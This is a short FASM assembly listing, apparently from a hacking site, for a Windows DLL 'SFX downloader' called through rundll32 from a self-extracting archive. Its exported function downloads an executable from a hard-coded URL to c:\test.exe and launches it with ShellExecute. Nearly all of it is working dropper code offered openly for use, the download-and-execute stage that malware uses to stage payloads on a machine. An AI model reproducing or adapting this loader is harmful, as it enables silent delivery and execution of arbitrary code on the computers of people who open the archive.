http://unremote.org/?p=716

1.  
2. ;-------------------------------
3. ; SFX Downloader via RunDLL32
4. ; Snippet by DarkCoderSc
5. ; unremote.org
6. ;-------------------------------
7.  
8. format PE GUI 4.0 DLL
9. entry DllEntryPoint
10.  
11. include 'win32a.inc'
12.  
13. ;-- rw
14. section '.data' data readable writeable
15.  
16. CMD_OPEN db 'open',0
17. url db 'http://unremote.org/test.exe',0
18. output db 'c:\\test.exe',0
19. errmsg db 'ERROR',0
20. errtitle db '',0
21. okmsg db 'OK',0
22. oktitle db '',0
23.  
24. section '.text' code readable executable
25.  
26. proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
27. mov eax,TRUE
28. ret
29. endp
30.  
31. ;-- This is the function we call via rundll32 via the SFX arg line
32. proc dcscdownload
33. xor eax, eax
34. invoke URLDownloadToFile, 0, url, output, 0, NULL ; download
35. cmp eax, 0
36. jne enderr
37. invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
38. jmp endok
39. enderr:
40. invoke MessageBox, 0, errmsg, errtitle,0
41. jmp endpr
42. endok:
43. invoke MessageBox, 0, okmsg, oktitle,0
44. endpr:
45. ret
46. endp
47.  
48. ;-- Import and export table
49. section '.idata' import data readable writeable
50.  
51. library kernel,'KERNEL32.DLL',\
52. urlmon,'URLMON.DLL',\
53. Shell32,'SHELL32.DLL',\
54. user,'USER32.DLL'
55.  
56. import Shell32,\
57. ShellExecute,'ShellExecuteA'
58.  
59. import user,\
60. MessageBox,'MessageBoxA'
61.  
62. import urlmon,\
63. URLDownloadToFile,'URLDownloadToFileA'
64.  
65. section '.edata' export data readable
66.  
67. export 'OURDLL.DLL',\
68. dcscdownload,'dcscdownload'
69.  
70. section '.reloc' fixups data discardable